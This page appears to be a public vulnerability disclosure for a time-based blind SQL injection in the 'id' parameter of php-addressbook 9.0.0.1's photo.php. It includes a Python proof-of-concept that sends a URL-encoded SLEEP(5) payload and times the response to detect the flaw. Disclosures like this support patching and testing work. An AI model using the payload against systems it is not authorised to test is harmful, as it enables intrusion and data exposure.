addressbook 9.0.0.1 id SQL Injection

2020.05.05
Credit: d4sh&r000
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title: addressbook 9.0.0.1 - 'id' SQL Injection # Date: 2020-04-01 # Author: David Velazquez a.k.a. d4sh&r000 # vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download # vulnerable version: 9.0.0.1 # Discription: addressbook 9.0.0.1 time-based blind SQL injection # Tested On: Ubuntu Server 20.04 LTS # Platform: PHP # Type: webapp # Use: # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1' #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import requests def isVulnerable(URL): """Check if the URL is vulnerable to ime-based blind SQL injection""" response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy') s=response.elapsed.total_seconds() if s>5:#I put a sleep sentence to test the bug sys.stdout.write('[+] Aplication is vulnerable!!!\n') else: sys.stdout.write('[+] Aplication NOT vulnerable\n') if __name__ == "__main__": isVulnerable(sys.argv[1])


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top